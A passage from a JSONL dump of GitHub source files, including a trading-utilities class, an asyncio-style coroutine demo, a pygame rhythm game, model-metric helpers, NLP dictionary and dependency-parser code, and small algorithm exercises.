opens...\", context, waitSeconds)\n time.sleep(waitSeconds)\n\n @staticmethod\n def getEpoch(datetimeObj):\n # This method converts given datetimeObj to epoch seconds\n epochSeconds = datetime.timestamp(datetimeObj)\n return int(epochSeconds) # converting double to long\n\n @staticmethod\n def getMarketStartTime():\n return Utils.getTimeOfToDay(9, 15, 0)\n\n @staticmethod\n def getMarketEndTime():\n return Utils.getTimeOfToDay(15, 30, 0)\n\n @staticmethod\n def getTimeOfToDay(hours, minutes, seconds):\n datetimeObj = datetime.now()\n datetimeObj = datetimeObj.replace(hour=hours, minute=minutes, second=seconds, microsecond=0)\n return datetimeObj\n\n @staticmethod\n def getTodayDateStr():\n now = datetime.now()\n return now.strftime(Utils.dateFormat)\n\n @staticmethod\n def isTodayHoliday():\n now = datetime.now()\n dayOfWeek = calendar.day_name[now.weekday()]\n if dayOfWeek == 'Saturday' or dayOfWeek == 'Sunday':\n return True\n\n todayDate = Utils.getTodayDateStr()\n holidays = getHolidays()\n if (todayDate in holidays):\n return True\n else:\n return False\n\n @staticmethod\n def generateTradeID():\n return str(uuid.uuid4())\n\n","repo_name":"SGChebrolu/sdoosa-algo-trade-python","sub_path":"src/utils/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"20524585608","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n# callbacks based async framework\n# * non blocking sockets 2°\n# * callbacks, allowing multiples operations to be waiting concurrently for i/o operations 3°\n# * event loop 3°\n# * coroutines 4°\n# --> Future\n# --> generators\n# --> Task, responsible for calling next() on the generators\n\n\nimport socket\nimport time\n\n# 2° to wait for some event on a non blocking socket\n# jusk ask for the default selector for your system\nfrom selectors import DefaultSelector, EVENT_WRITE, EVENT_READ\nselector = DefaultSelector()\nn_tasks = 0\n\n\n# a Future represent some pending event we're waiting for\nclass Future:\n def __init__(self):\n self.callbacks = [] # what to do when event occurs\n\n def resolve(self):\n for c in self.callbacks:\n c()\n\nclass Task:\n def __init__(self, gen):\n self.gen = gen\n self.step() # to first execute the part before the yield instruction\n\n def step(self):\n try:\n # generator will yield a future, let's capture that\n f = next(self.gen)\n except StopIteration:\n return\n\n # once the future is ready,\n # prepare another call to next(self.gen) again,\n # that will execute the part after the yield instruction\n f.callbacks.append(self.step)\n\n\n# client socket to retrieve something from a server\ndef get(path):\n global n_tasks\n n_tasks += 1\n\n s = socket.socket()\n s.setblocking(False) # socket no more blocking\n try:\n s.connect(('duckduckgo.com', 80)) # will return immediately or raise exception\n except BlockingIOError:\n pass\n\n request = 'GET %s HTTP/1.0\\r\\n\\r\\n' % path\n\n f = Future()\n # dear selector, I'm interested in any event that may occur on this file descriptor (my socket)\n selector.register(s.fileno(), EVENT_WRITE, data=f)\n # how to pause until s is writable?\n yield f\n\n # I'm no more interested in the write event on my socket, please forget about it\n selector.unregister(s.fileno())\n # socket is writable, so we can send\n s.send(request.encode()) # un-code\n\n chunks = []\n\n while True:\n f = Future()\n # dear selector, I'm interested in any read event that may occur on this file descriptor\n selector.register(s.fileno(), EVENT_READ, data=f)\n # how to pause until s is readable\n yield f\n # I'm no more interested in the read event on my socket, please forget about it\n selector.unregister(s.fileno())\n\n chunk = s.recv(1000)\n if chunk:\n chunks.append(chunk)\n else: #empty chunk, server hang up\n body = b''.join(chunks).decode() # be-code\n print(body.split('\\n')[0])\n n_tasks -= 1\n return\n\nstart = time.time()\n\n# we need now to create our tasks\n# a task get a generator\n# then call next to execute the first part, before yied\nTask(get('/?q=python+socket+&t=lm&ia=about'))\nTask(get('/?q=golang+socket+&t=lm&ia=about'))\nTask(get('/?q=rust+socket+&t=lm&ia=about'))\nTask(get('/?q=erlang+socket+&t=lm&ia=about'))\nTask(get('/?q=python+socket+&t=lm&ia=about'))\nTask(get('/?q=golang+socket+&t=lm&ia=about'))\nTask(get('/?q=rust+socket+&t=lm&ia=about'))\nTask(get('/?q=erlang+socket+&t=lm&ia=about'))\nTask(get('/?q=python+socket+&t=lm&ia=about'))\nTask(get('/?q=golang+socket+&t=lm&ia=about'))\nTask(get('/?q=rust+socket+&t=lm&ia=about'))\nTask(get('/?q=erlang+socket+&t=lm&ia=about'))\nTask(get('/?q=python+socket+&t=lm&ia=about'))\nTask(get('/?q=golang+socket+&t=lm&ia=about'))\nTask(get('/?q=rust+socket+&t=lm&ia=about'))\nTask(get('/?q=erlang+socket+&t=lm&ia=about'))\n\n\nwhile n_tasks:\n # retrieve events\n events = selector.select()\n for event, mask in events:\n future = event.data # retrieve the future\n # call the callbacks associated to the future\n future.resolve()\n\n# get launched serially, so final time is time for one request times number of requests\nprint(\"took %.1f sec\" % (time.time() - start))\n","repo_name":"PlumpMath/how-coroutines-works","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13630629396","text":"import pygame, random, time, os\nimport sys\n\npygame.init()\n\nwidth = 640\nheight = 480\ntitle_width = 300\ntitle_height = 100\nstart_button_width = 100\nstart_button_height = 50\nexit_button_width = 100\nexit_button_height = 50\n\nscreen = pygame.display.set_mode((width, height))\nsurface = pygame.Surface((100,100))\n\n\npygame.display.set_caption(\"Rhythm Game\")\n\ntitle = pygame.image.load(\"title.jpg\")\nstart_button = pygame.image.load(\"start.jpg\")\nexit_button = pygame.image.load(\"exit.jpg\")\nbackground = pygame.image.load(\"BackGround.jpg\")\n\ntitle = pygame.transform.scale(title, (title_width, title_height))\nstart_button = pygame.transform.scale(start_button, (start_button_width, start_button_height))\nexit_button = pygame.transform.scale(exit_button, (exit_button_width, exit_button_height))\n\nrunning = True\ngame_state = \"start\"\n\nwhile running:\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT:\n running = False\n\n if event.type == pygame.MOUSEBUTTONDOWN and game_state == \"start\":\n mouse_x, mouse_y = event.pos\n\n start_button_rect = start_button.get_rect()\n start_button_rect.topleft = (start_button_x, start_button_y)\n\n if start_button_rect.collidepoint(mouse_x, mouse_y):\n game_state = \"play\"\n\n exit_button_rect = exit_button.get_rect()\n exit_button_rect.topleft = (exit_button_x, exit_button_y)\n\n if exit_button_rect.collidepoint(mouse_x, mouse_y):\n running = False\n\n screen.blit(background, (0, 0))#배경 화면 그리기\n screen.blit(title, (200, 100))#제목 그리기\n\n if game_state == \"start\":\n\n #버튼의 위치\n start_button_x = width // 2 - 200\n start_button_y = 300\n exit_button_x = width // 2 + 120\n exit_button_y = 300\n\n #버튼 생성\n screen.blit(start_button, (start_button_x, start_button_y))\n screen.blit(exit_button, (exit_button_x, exit_button_y))\n\n #다음 화면 구현\n elif game_state == \"play\":\n \n surface.fill((0,0,0))\n \n w = 640\n h = 480\n\n clock = pygame.time.Clock()\n keys = [0,0,0,0]\n keyset = [0,0,0,0]\n maxframe = 60\n fps = 0\n gst = time.time()\n speed = 2\n notesumt = 0\n\n a = 0\n aa = 0\n\n t1 = []\n t2 = []\n t3 = []\n t4 = []\n\n def sum_note(n):\n if n == 1:\n ty = 0 #노트 y축\n tst = Time #노트 소환 시간\n if n == 1:\n t1.append([ty,tst])\n if n == 2:\n t2.append([ty,tst])\n if n == 3:\n t3.append([ty,tst])\n if n == 4:\n t4.append([ty,tst])\n\n\n while True:\n \n \n \n Time = time.time() - gst\n\n if Time > 0.2 * notesumt:\n notesumt += 1\n while a == aa:\n a = random.randint(1, 4)\n sum_note(a) \n aa = a\n #노트 랜덤하게 떨어지게 만드는 함수\n\n fps = clock.get_fps()\n\n if fps == 0:\n fps = maxframe\n\n for event in pygame.event.get(): #키 눌렀을때 노트 떨어짐(노트 삭제 포함)\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_e:\n keyset[0] = 1\n if len(t1) > 0:\n if t1[0][0] > h / 2:\n del t1[0]\n if event.key == pygame.K_f:\n keyset[1] = 1\n if len(t1) > 0:\n if t2[0][0] > h / 2:\n del t2[0]\n if event.key == pygame.K_j:\n keyset[2] = 1\n if len(t1) > 0:\n if t3[0][0] > h / 2:\n del t3[0]\n if event.key == pygame.K_i:\n keyset[3] = 1\n if len(t1) > 0:\n if t4[0][0] > h / 2:\n del t4[0]\n \n if event.type == pygame.KEYUP:\n if event.key == pygame.K_e:\n keyset[0] = 0\n if event.key == pygame.K_f:\n keyset[1] = 0\n if event.key == pygame.K_j:\n keyset[2] = 0\n if event.key == pygame.K_i:\n keyset[3] = 0\n\n for tile_data in t1:\n tile_data[0] = (h/12) * 9 + (Time - tile_data[1]) * 350 * speed * (h/900)\n pygame.draw.rect(screen, (255,255,255),(w / 2 - w / 8, tile_data[0] - h / 100, w / 16 , h / 50))\n if tile_data[0] > h - (h / 9):\n t1.remove(tile_data)\n for tile_data in t2:\n tile_data[0] = (h/12) * 9 + (Time - tile_data[1]) * 350 * speed * (h/900)\n pygame.draw.rect(screen, (255,255,255),(w / 2 - w / 16, tile_data[0] - h / 100, w / 16 , h / 50))\n if tile_data[0] > h - (h / 9):\n t2.remove(tile_data)\n for tile_data in t3:\n tile_data[0] = (h/12) * 9 + (Time - tile_data[1]) * 350 * speed * (h/900)\n pygame.draw.rect(screen, (255,255,255),(w / 2 + w / 16, tile_data[0] - h / 100, w / 16 , h / 50))\n if tile_data[0] > h - (h / 9):\n t3.remove(tile_data)\n for tile_data in t4:\n tile_data[0] = (h/12) * 9 + (Time - tile_data[1]) * 350 * speed * (h/900)\n pygame.draw.rect(screen, (255,255,255), (w / 2 + w / 8, tile_data[0] - h / 100, w / 16 , h / 50))\n if tile_data[0] > h - (h / 9):\n t4.remove(tile_data)\n \n #감속속도 ============================================================= \n keys[0] += (keyset[0] - keys[0]) / (3 * (maxframe / fps))\n keys[1] += (keyset[1] - keys[1]) / (3 * (maxframe / fps))\n keys[2] += (keyset[2] - keys[2]) / (3 * (maxframe / fps))\n keys[3] += (keyset[3] - keys[3]) / (3 * (maxframe / fps))\n \n clock.tick(maxframe) #프레임제한\n \n pygame.display.flip()\n\npygame.display.update()\n\npygame.quit()\nsys.exit()\n\n","repo_name":"rladlsrua794/rhythmGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27732354567","text":"import pandas as pd\r\nimport warnings\r\nfrom sklearn.metrics import *\r\nwarnings.filterwarnings('ignore')\r\npd.set_option('display.max_rows', 500)\r\npd.set_option('display.max_columns', 500)\r\npd.set_option('display.width', 500)\r\nfrom pylab import mpl\r\nmpl.rcParams['font.sans-serif'] = ['SimHei'] # 指定默认字体\r\nmpl.rcParams['axes.unicode_minus'] = False # 解决保存图像是负号'-'显示为方块的问题\r\nfrom feature_proc import *\r\nfrom sklearn.metrics import *\r\n\r\ndef ks_results(x,target,model):\r\n prob_target=pd.DataFrame(target)\r\n prob_target['prob'] = model.predict_proba(x)[:, 1]\r\n cross1 = pd.crosstab(prob_target['prob'], prob_target['target'])\r\n cross1 = cross1.reset_index()\r\n if 0 not in cross1.columns:\r\n cross1[0] = 0\r\n if 1 not in cross1.columns:\r\n cross1[1] = 0\r\n cross1['y_cum_r'] = cross1[1].cumsum() / cross1[1].sum()\r\n cross1['n_cum_r'] = cross1[0].cumsum() / cross1[0].sum()\r\n cross1['ks'] = cross1['n_cum_r'] - cross1['y_cum_r']\r\n KS = cross1['ks'].abs().max()\r\n return KS\r\n\r\ndef auc_results(x, target, model):\r\n prob = model.predict_proba(x)[:, 1]\r\n auc = roc_auc_score(target, prob)\r\n return auc\r\n\r\ndef regress_results(data, target, model):\r\n predict = model.predict(data)\r\n # 平均绝对值误差(mean_absolute_error)\r\n mae = mean_absolute_error(target, predict)\r\n # 决定系数(R-Square)\r\n r2 = r2_score(target, predict)\r\n # 校正决定系数(Adjusted R-Square)\r\n r2_adj = 1 - (1 - r2) * (len(data) - 1) / (len(data) - data.shape[1] - 1)\r\n # 均方误差 MSE(Mean Squared Error)\r\n mse = mean_squared_error(target, predict)\r\n\r\n # #均方根对数误差 RMSLE(Root Mean Squared Logarithmic Error)\r\n # train_rmse=mean_squared_log_error(train_target,train_predict)\r\n # test_rmse=mean_squared_log_error(test_target,test_predict)\r\n # 平均绝对误差 MAD(mean absolute deviation)\r\n def MAD(target, predictions):\r\n absolute_deviation = np.abs(target - predictions)\r\n return np.mean(absolute_deviation)\r\n\r\n msd = MAD(target, predict)\r\n\r\n # 平均绝对百分比误差(Mean Absolute Percentage Error)\r\n def mape(y_true, y_pred):\r\n return np.mean(np.abs((y_pred - y_true) / (y_true + 10 ** (-5)))) * 100\r\n\r\n mape = mape(target, predict)\r\n\r\n # 对称平均绝对百分比误差(Symmetric Mean Absolute Percentage Error)\r\n def smape(y_true, y_pred):\r\n return 2.0 * np.mean(np.abs(y_pred - y_true) / (np.abs(y_pred) + np.abs(y_true))) * 100\r\n\r\n smape = smape(target, predict)\r\n # 解释方差(explained_variance_score)\r\n evs = explained_variance_score(target, predict)\r\n\r\n # 标准残差图\r\n def std_e(y_true, y_pred, train_data):\r\n e = y_true - y_pred\r\n sse = np.sum(np.square(e))\r\n se = sse / (len(y_true) - len(train_data) - 1)\r\n try:\r\n d = e / se\r\n except:\r\n d = 0\r\n return d\r\n\r\n e = std_e(target, predict, data)\r\n e_df = pd.DataFrame(e).reset_index()\r\n e_df.columns = ['x_col', 'e']\r\n\r\n name_lst = [' R-Square',\r\n 'Adjusted R-Square',\r\n 'explained_variance_score',\r\n 'mean_absolute_error',\r\n # '均方根对数误差 RMSLE(Root Mean Squared Logarithmic Error)',\r\n 'mean absolute deviation',\r\n 'Mean Absolute Percentage Error',\r\n 'Symmetric Mean Absolute Percentage Error',\r\n 'Mean Squared Error']\r\n\r\n bz_lst = [' 拟合优度',\r\n '校正决定系数',\r\n '解释方差',\r\n '平均绝对值误差',\r\n # '均方根对数误差',\r\n '平均绝对误差',\r\n '平均绝对百分比误差',\r\n '对称平均绝对百分比误差',\r\n '均方误差']\r\n\r\n vl = [r2, r2_adj, evs, mae, msd, mape, smape, mse]\r\n\r\n train_dct = dict(zip(name_lst, vl))\r\n\r\n model_test = pd.DataFrame(train_dct, index=[0]).T.reset_index()\r\n model_test.columns = ['评估指标', '评估指标值']\r\n model_test['备注'] = bz_lst\r\n\r\n predict = pd.DataFrame(predict, index=range(len(predict)))\r\n target.index = range(len(target))\r\n results = pd.concat([target, predict], axis=1)\r\n results.columns = ['real', 'predict']\r\n\r\n return model_test, results,e_df\r\n\r\ndef f_regress_results(rf_model,data_sets):\r\n train_results,train_predict_df,train_e_df=regress_results(data_sets['train_x'],data_sets['train_y'],rf_model)\r\n test_results,test_predict_df,test_e_df=regress_results(data_sets['test_x'],data_sets['test_y'],rf_model)\r\n future_results,future_predict_df,future_e_df=regress_results(data_sets['data_future'],data_sets['target_future'],rf_model)\r\n\r\n results=pd.merge(pd.merge(train_results,test_results,on=['评估指标','备注']),future_results,on=['评估指标','备注'])\r\n results.columns=['评估指标','评估指标值-训练集','备注','评估指标值-验证集','评估指标集-测试集']\r\n results=results[['评估指标','评估指标值-训练集','评估指标值-验证集','评估指标集-测试集','备注']]\r\n\r\n return results\r\n\r\ndef f_features_ana(data,target,vars_name,flag,model=None):\r\n vars=data.drop([target],axis=1).columns.tolist()\r\n vn_dct=dict(zip(vars,vars_name))\r\n if flag=='model':\r\n model.fit(data.drop([target],axis=1), data[target])\r\n imp=model.feature_importances_\r\n vars_imp=pd.DataFrame(dict(zip(vars,imp)),index=[0]).T.reset_index()\r\n vars_imp.columns=['变量名','特征重要性']\r\n vars_imp.变量名=vars_imp.变量名.replace(vn_dct)\r\n elif flag=='mr':\r\n mr_inf=dict()\r\n for v in data.columns:\r\n mr_tmp=mutual_info_score(data[v],data[target])\r\n mr_inf[v]=mr_tmp\r\n vars_imp=pd.DataFrame(mr_inf,index=[0]).T.reset_index()\r\n vars_imp.columns=['变量名','特征重要性']\r\n vars_imp.sort_values('特征重要性',ascending=False)\r\n vars_imp.变量名=vars_imp.变量名.replace(vn_dct)\r\n vars_imp=vars_imp.sort_values('特征重要性',ascending=False)\r\n\r\n return vars_imp\r\n","repo_name":"wzg-zhuo/automl","sub_path":"automl/model_results.py","file_name":"model_results.py","file_ext":"py","file_size_in_byte":6185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40398128069","text":"# -*- coding: utf-8 -*-\n\n\nimport itertools\nfrom collections import Counter\nfrom typing import *\n\nfrom multiprocessing import Pool\n\nimport torch\n\nfrom ncc.data import constants\nfrom ncc.data.constants import INF\nfrom ncc.data.dictionary import Dictionary\n\n\nclass XFGDicionary(Dictionary):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def encode_line(\n self,\n line,\n line_tokenizer,\n add_if_not_exist=True,\n consumer=None,\n append_eos=True,\n reverse_order=False,\n **kwargs\n ):\n words = line_tokenizer(line, vocab=self, **kwargs) if line_tokenizer is not None else line\n if reverse_order:\n words = list(reversed(words))\n nwords = len(words)\n ids = torch.IntTensor(nwords + 1 if append_eos else nwords)\n\n for i, word in enumerate(words):\n if add_if_not_exist:\n idx = self.add_symbol(word)\n else:\n idx = self.index(word)\n # assert idx != self.unk_index, (line, word)\n if consumer is not None:\n consumer(word, idx)\n ids[i] = idx\n if append_eos:\n ids[nwords] = self.eos_index\n return ids\n\n @staticmethod\n def _add_xfg_to_dictionary(\n self,\n line,\n line_tokenizer,\n add_if_not_exist=True,\n consumer=None,\n append_eos=True,\n reverse_order=False,\n **kwargs,\n ):\n words = line_tokenizer(line, **kwargs) if line_tokenizer is not None else line\n if reverse_order:\n words = list(reversed(words))\n nwords = len(words)\n ids = torch.IntTensor(nwords + 1 if append_eos else nwords)\n for i, word in enumerate(words):\n if add_if_not_exist:\n idx = self.add_symbol(word)\n else:\n idx = self.index(word)\n if consumer is not None:\n consumer(word, idx)\n ids = list(itertools.chain(*ids))\n ids = torch.IntTensor(ids)\n return ids\n\n @staticmethod\n def add_xfg_to_dictionary(filename: str, dict, tokenize: Any, eos_word: Optional[str], num_workers: int):\n def merge_result(counter: Counter):\n for w, c in sorted(counter.items()):\n dict.add_symbol(w, c)\n\n if num_workers > 1:\n pool = Pool(processes=num_workers)\n results = []\n for worker_id in range(num_workers):\n results.append(\n pool.apply_async(\n XFGDicionary._add_file_to_dictionary_single_worker,\n (filename, tokenize, eos_word, worker_id, num_workers),\n )\n )\n pool.close()\n pool.join()\n for r in results:\n merge_result(r.get())\n else:\n merge_result(\n XFGDicionary._add_xfg_to_dictionary(\n filename, tokenize, eos_word\n )\n )\n","repo_name":"CGCL-codes/naturalcc","sub_path":"ncc/data/mapping/xfg_dictionary.py","file_name":"xfg_dictionary.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":220,"dataset":"github-code","pt":"53"} +{"seq_id":"28449503151","text":"n = int(input())\n#dp[n] : n번째 까지 마실수 있는 최대 와인의 양\ndp = [0]*n\ngrape = []\nfor _ in range(n):\n grape.append(int(input()))\ndp[0] = grape[0]\nif n > 1:\n dp[1] = grape[0]+grape[1]\n if n > 2:\n dp[2] = max(grape[0]+grape[1],grape[0]+grape[2],grape[1]+grape[2])\nfor i in range(3,n):\n dp[i] = max(dp[i-3]+grape[i-1]+grape[i], dp[i-2]+grape[i], dp[i-1])\nprint(max(dp))\n","repo_name":"imsoncod/Python-Algorithm","sub_path":"BAKEJOON/다이나믹 프로그래밍/포도주 시식.py","file_name":"포도주 시식.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6222084299","text":"class Solution:\n # @return a tuple, (index1, index2)\n def twoSum(self, num, target):\n mapper = {}\n n = len(num)\n for i in range(n):\n mapper[num[i]] = i\n for i in range(n):\n if target - num[i] in mapper and mapper[target - num[i]] != i:\n return (i + 1, mapper[target - num[i]] + 1)\n return (-1, -1)","repo_name":"Shuaiyicao/leetcode-python","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1770204200","text":"import math\nimport numpy as np \n\n# euler's method\n# y_n+1 = y_n + h(f'(x))\n\nh = 0.1 # step size \nx_val_wanted = 1\niterations = int(x_val_wanted / h)\n\nx0 = 0.36\n\nyn = x0\nf_prime = 0.18432\n\nvals = []\nvals = [0 for i in range((iterations+1))]\n\nvals[0] = x0 \nfor i in range(iterations):\n\tvals[i + 1] = vals[i] + ((0.8 * (vals[i])) * (1 - vals[i]) * (h))\n\tprint(vals[i+1])\n","repo_name":"anaconda121/School","sub_path":"Math/431/euler_method_550.py","file_name":"euler_method_550.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23838797422","text":"from collections import OrderedDict\nimport numpy as np\nfrom .dependency_instance_numeric import DependencyInstanceNumeric\nfrom .constants import Target\n\n\nclass DependencyPart(object):\n \"\"\"\n Base class for Dependency Parts\n \"\"\"\n __slots__ = 'head', 'modifier'\n\n def __init__(self):\n raise NotImplementedError('Abstract class')\n\n def __str__(self):\n nodes = [('h', self.head), ('m', self.modifier)]\n if hasattr(self, 'grandparent'):\n nodes.append(('g', self.grandparent))\n if hasattr(self, 'sibling'):\n nodes.append(('s', self.sibling))\n if hasattr(self, 'label'):\n nodes.append(('l', self.label))\n\n nodes_strings = ['{}={}'.format(node[0], node[1]) for node in nodes]\n str_ = self.__class__.__name__ + '(' + ', '.join(nodes_strings) + ')'\n return str_\n\n\nclass Arc(DependencyPart):\n def __init__(self, head=-1, modifier=-1):\n self.head = head\n self.modifier = modifier\n\n\nclass LabeledArc(DependencyPart):\n __slots__ = 'label',\n\n def __init__(self, head=-1, modifier=-1, label=-1):\n self.head = head\n self.modifier = modifier\n self.label = label\n\n\nclass Grandparent(DependencyPart):\n __slots__ = 'grandparent',\n\n def __init__(self, head=-1, modifier=-1, grandparent=-1):\n self.head = head\n self.modifier = modifier\n self.grandparent = grandparent\n\n\nclass NextSibling(DependencyPart):\n __slots__ = 'sibling'\n\n def __init__(self, head=-1, modifier=-1, sibling=-1):\n self.head = head\n self.modifier = modifier\n self.sibling = sibling\n\n\nclass GrandSibling(DependencyPart):\n __slots__ = 'grandparent', 'sibling'\n\n def __init__(self, head=-1, modifier=-1, grandparent=-1, sibling=-1):\n self.head = head\n self.modifier = modifier\n self.sibling = sibling\n self.grandparent = grandparent\n\n\nclass DependencyParts(object):\n def __init__(self, instance, model_type, mask=None, num_relations=None):\n \"\"\"\n A DependencyParts object stores all the parts into which a dependency\n tree is factored.\n\n This class has an attribute arc_mask to indicate which arcs are\n considered possible. In principle, all labels are considered possible\n for possible arcs.\n\n For higher order parts, it stores OrderedDict's that map the class\n (i.e., a class object, not an instance) to DependencyPart objects such\n as Grandparent, NextSibling, etc.\n\n :param instance: a DependencyInstanceNumeric object\n :param model_type: a ModelType object, indicating which type of parts\n should be created (siblings, grandparents, etc)\n :param mask: either None (no prune) or a bool numpy matrix with shape\n (n, n) -- n is number of words with root. Cell (h, m) indicates\n if the arc from h to m is considered, if True, or pruned out, if\n False.\n :param num_relations: number of dependency relations, if used\n \"\"\"\n self.index = None\n self.index_labeled = None\n self.num_parts = 0\n\n # the mask is to be interpreted as (head, modifier)\n self.arc_mask = mask\n self.num_relations = num_relations\n\n # offsets indicate the position in which the scores of a given target\n # should start in the array with all part scores\n self.offsets = {}\n\n # store the order in which part types are used\n self.type_order = []\n\n # part_lists[Type] contains the list of Type parts\n self.part_lists = OrderedDict()\n\n self.make_parts(instance, model_type)\n\n self.best_labels = {}\n\n def save_best_labels(self, best_labels, arcs):\n \"\"\"\n Save the best labels for each arc in a dictionary.\n\n :param best_labels: array with the best label for each arc\n :param arcs: list of tuples (h, m)\n \"\"\"\n self.best_labels = dict(zip(arcs, best_labels))\n\n def concatenate_part_scores(self, scores):\n \"\"\"\n Concatenate all the vectors of part scores in the given dictionary to a\n single vector in the same order used in parts.\n\n :param scores: dictionary mapping target names to arrays\n :return: a single numpy array\n \"\"\"\n score_list = [scores[type_] for type_ in self.type_order]\n return np.concatenate(score_list)\n\n def get_labels(self, heads):\n \"\"\"\n Return the labels associated with the given head attachments for the\n words.\n\n :param heads: list or array with the head of each word in the sentence\n (root not included)\n :return: a list of predicted labels\n \"\"\"\n pred_labels = []\n for m, h in enumerate(heads, 1):\n label = self.best_labels[(h, m)]\n pred_labels.append(label)\n\n return pred_labels\n\n def add_dummy_relation(self, head, modifier):\n \"\"\"\n Add a dummy relation for the arc (head, modifier) in case it didn't \n exist. This can be necessary when the single root constraint forces the\n parser to reassign some head.\n \"\"\"\n if (head, modifier) in self.best_labels:\n return\n\n self.best_labels[(head, modifier)] = 0\n \n def make_parts(self, instance, model_type):\n \"\"\"\n Create all the parts to represent the instance\n \"\"\"\n # if no mask was given, create an all-True mask with a False diagonal\n # and False in the first column (root as modifier)\n if self.arc_mask is None:\n length = len(instance)\n self.arc_mask = np.ones([length, length], dtype=np.bool)\n self.arc_mask[np.arange(length), np.arange(length)] = False\n self.arc_mask[:, 0] = False\n\n # TODO: enforce connectedness (necessary if pruning by tag or distance)\n\n # if there are gold labels, store them\n self.gold_parts = self._make_gold_arcs(instance)\n self.type_order.append(Target.HEADS)\n self.offsets[Target.HEADS] = 0\n\n # all non-masked arcs count as a part\n self.num_arcs = self.arc_mask.sum()\n\n # labeled arcs are represented in the same order as arcs,\n # with each arc (i, j) repeated k times, for each of k labels\n self.num_labeled_arcs = self.num_arcs * self.num_relations\n self.type_order.append(Target.RELATIONS)\n self.offsets[Target.RELATIONS] = self.num_arcs\n\n offset = self.num_arcs + self.num_labeled_arcs\n\n if model_type.consecutive_siblings:\n self.make_consecutive_siblings(instance)\n self.offsets[Target.NEXT_SIBLINGS] = offset\n offset += len(self.part_lists[Target.NEXT_SIBLINGS])\n\n if model_type.grandparents:\n self.make_grandparents(instance)\n self.offsets[Target.GRANDPARENTS] = offset\n offset += len(self.part_lists[Target.GRANDPARENTS])\n\n if model_type.grandsiblings:\n self.make_grandsiblings(instance)\n self.offsets[Target.GRANDSIBLINGS] = offset\n offset += len(self.part_lists[Target.GRANDSIBLINGS])\n\n self.num_parts = self.num_arcs + self.num_labeled_arcs + \\\n sum(len(parts) for parts in self.part_lists.values())\n for type_ in self.part_lists:\n self.type_order.append(type_)\n\n if self.make_gold:\n self.gold_parts = np.array(self.gold_parts, dtype=np.float32)\n assert self.num_parts == len(self.gold_parts)\n\n def _make_gold_arcs(self, instance: DependencyInstanceNumeric):\n \"\"\"\n If the instance has gold heads, create a list with the gold arcs and\n gold relations.\n\n :return: a list of 0s and 1s\n \"\"\"\n heads = instance.get_all_heads()\n if heads[1] == -1:\n # check if the first non-root token has a head\n self.make_gold = False\n return\n\n self.make_gold = True\n relations = instance.get_all_relations()\n gold_parts = []\n gold_relations = []\n length = len(instance)\n\n for h in range(length):\n for m in range(1, length):\n if not self.arc_mask[h, m]:\n continue\n\n gold_head = heads[m] == h\n if gold_head:\n gold_parts.append(1)\n else:\n gold_parts.append(0)\n\n for rel in range(self.num_relations):\n if gold_head and relations[m] == rel:\n gold_relations.append(1)\n else:\n gold_relations.append(0)\n gold_parts.extend(gold_relations)\n return gold_parts\n\n def make_grandparents(self, instance):\n \"\"\"\n Create the parts relative to grandparents.\n\n Each part means that an arc h -> m and g -> h exist at the same time.\n\n :type instance: DependencyInstanceNumeric\n \"\"\"\n gp_parts = []\n for g in range(len(instance)):\n for h in range(1, len(instance)):\n if g == h:\n continue\n\n if not self.arc_mask[g, h]:\n # the arc g -> h has been pruned out\n continue\n\n gold_gh = instance.get_head(h) == g\n\n for m in range(1, len(instance)):\n if h == m:\n # g == m is necessary to run the grandparent factor\n continue\n\n if not self.arc_mask[h, m]:\n # pruned out\n continue\n\n part = Grandparent(h, m, g)\n if self.make_gold:\n if gold_gh and instance.get_head(m) == h:\n gold = 1\n else:\n gold = 0\n self.gold_parts.append(gold)\n\n gp_parts.append(part)\n\n self.part_lists[Target.GRANDPARENTS] = gp_parts\n\n def make_consecutive_siblings(self, instance):\n \"\"\"\n Create the parts relative to consecutive siblings.\n\n Each part means that an arc h -> m and h -> s exist at the same time,\n with both h > m and h > s or both h < m and h < s.\n\n :param instance: DependencyInstance\n :type instance: DependencyInstanceNumeric\n \"\"\"\n parts = []\n for h in range(len(instance)):\n\n # siblings to the right of h\n # when m = h, it signals that s is the first child\n for m in range(h, len(instance)):\n\n if h != m and not self.arc_mask[h, m]:\n # pruned out\n continue\n\n gold_hm = m == h or instance.get_head(m) == h\n arc_between = False\n\n # when s = length, it signals that m encodes the last child\n for s in range(m + 1, len(instance) + 1):\n if s < len(instance) and not self.arc_mask[h, s]:\n # pruned out\n continue\n\n if self.make_gold:\n gold_hs = s == len(instance) or \\\n instance.get_head(s) == h\n\n if gold_hm and gold_hs and not arc_between:\n gold = 1\n arc_between = True\n else:\n gold = 0\n\n self.gold_parts.append(gold)\n part = NextSibling(h, m, s)\n parts.append(part)\n\n # siblings to the left of h\n for m in range(h, -1, -1):\n if h != m and not self.arc_mask[h, m]:\n # pruned out\n continue\n\n gold_hm = m == h or instance.get_head(m) == h\n arc_between = False\n\n # when s = 0, it signals that m encoded the leftmost child\n for s in range(m - 1, -2, -1):\n if s != -1 and not self.arc_mask[h, s]:\n # pruned out\n continue\n\n if self.make_gold:\n gold_hs = s == -1 or instance.get_head(s) == h\n\n if gold_hm and gold_hs and not 